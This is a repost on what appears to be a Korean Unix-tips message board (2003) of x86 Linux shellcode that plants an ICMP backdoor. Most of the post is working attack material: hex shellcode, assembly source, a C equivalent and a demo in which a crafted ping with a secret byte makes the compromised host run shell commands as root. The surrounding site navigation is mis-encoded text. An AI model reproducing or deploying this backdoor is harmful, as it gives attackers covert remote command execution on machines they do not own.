BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: ±Û·ç¹Ì icmp based Shellcode Á¶È¸¼ö: 6229


Linux ICMP Based Shellcode

Details
The following is a 137-byte Linux shellcode that creates a remote ICMP backdoor that can be controlled trough the ping utility.

Shellcode:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

[example]

main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137

main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#

*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SECRET_CHAR "\x99"

char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89"
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb"
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43"
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
"\xff"
"/bin/sh -c";

void asm_code() {
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80 /* socket(); */
movl %eax,%edx

movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit

endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80 /* recvfrom(); */

movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al /* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop

movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80 /* close(); */

pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80 /* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80 /* exit(); */
stack:
call execve
.string \"/bin/sh -c\"

");
}


void c_code() {
int fd;
int nb = 0;
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL};

fd = socket(2,3,1);
if (fork() > 0) exit(0);
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
buf[nb-1] = 0;
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
}
}

int main(int c,char *v[]) {
void (*i)();
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
i();
return 0;
}



°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2003/07/08 11:53 from 218.38.148.150

  inetd¸¦ ÀÌ¿ëÇÑ Æ÷Æ®¿­±â ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ Samba 2.x remote expolit (x86)  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡